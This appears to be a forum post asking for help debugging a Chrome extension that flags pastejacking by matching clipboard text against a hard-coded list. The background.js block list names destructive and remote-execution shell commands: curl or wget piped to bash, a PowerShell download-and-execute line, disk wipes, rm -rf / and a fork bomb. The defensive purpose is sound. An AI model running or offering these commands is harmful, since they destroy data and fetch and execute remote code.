So I'm making a chrome extension which basically reads the clipboard contents and then tries to match it with the values in the array which is located in background js file. If the content matches then it flags user with the popup. Actually it's my project for handling Pastejacking Vulnerability.
---------------------------------------------------------------------------------------------------
----------------------------------------------------------------------------------------------------------------
Here is background file :
----------------------------------------------------------------------------------------------
const maliciousContent = [
"echo \"evil\"",
"rm -rf /",
":(){ :|: & };:",
"mkfs.ext3 /dev/sda",
"wget -q -O-
http://example.com/malicious.sh | bash",
"chmod -R 777 /",
"dd if=/dev/zero of=/dev/sda",
"sudo userdel -r username",
'echo "malicious_code" > ~/.bash_profile',
"cat /dev/urandom > /dev/sda",
"mv /bin/bash /bin/sh",
"sudo mv /etc/sudoers /dev/null",
'echo "malicious_code" >> /etc/rc.local',
"curl
http://example.com/malicious.sh | sudo sh",
":(){ :|:& };: > /dev/null",
"sudo rm -rf / --no-preserve-root",
'echo "malicious_code" > /etc/passwd',
"cat /dev/zero > /dev/sda",
"sudo mv /bin/su /bin/disable_su",
"rm -rf ~",
'echo "alias sudo=\'rm -rf /\'">>.bashrc',
"wget -O /tmp/malicious.sh
http://example.com/malicious.sh && chmod +x /tmp/malicious.sh && /tmp/malicious.sh",
"curl -sSL
http://example.com/malicious.sh | bash",
"bash -c \"$(curl -fsSL
http://example.com/malicious.sh)\"",
"curl
http://example.com/malicious.php | php",
"powershell -c \"IEX(New-Object Net.WebClient).DownloadString('
http://example.com/malicious.ps1')\"",
"echo \"$(curl -fsSL
http://example.com/malicious.sh)\" | bash"
];
function isMalicious(content) {
return maliciousContent.includes(content);
}
function handleClipboardChange() {
chrome.clipboard.readText(function(clipboardContent) {
if (isMalicious(clipboardContent)) {
chrome.notifications.create({
type: "basic",
iconUrl: "hello_extensions.png",
title: "Malicious Content Detected",
message: "Something malicious is copied to your clipboard. Please check it out."
});
}
});
}
chrome.clipboard.onChanged.addListener(handleClipboardChange);
---------------------------------------------------------------------------------------------------
and here is my popup.html:
------------------------------------------------------------------------------
<body>
<div class="popup-container">
<h2>Malicious Content Detected</h2>
<p>Something malicious is copied to your clipboard. Please check it out.</p>
<button id="closeButton">Close</button>
</div>
<script src="popup.js"></script>
</body>
-----------------------------------------------------------------------------------
and here is my popup.js file:
--------------------------------------------------------------------
function closePopup() {
window.close();
}
document.getElementById("closeButton").addEventListener("click", closePopup);
------------------------------------------------------------------------------
I'm having trouble with the execution part:
1) I can't change the default favicon for the extension, even if i do so, it would lead to error in chrome://extension developer's mode
2) I can't load my backgroung.js file
It would be a great help if someone can debug this :)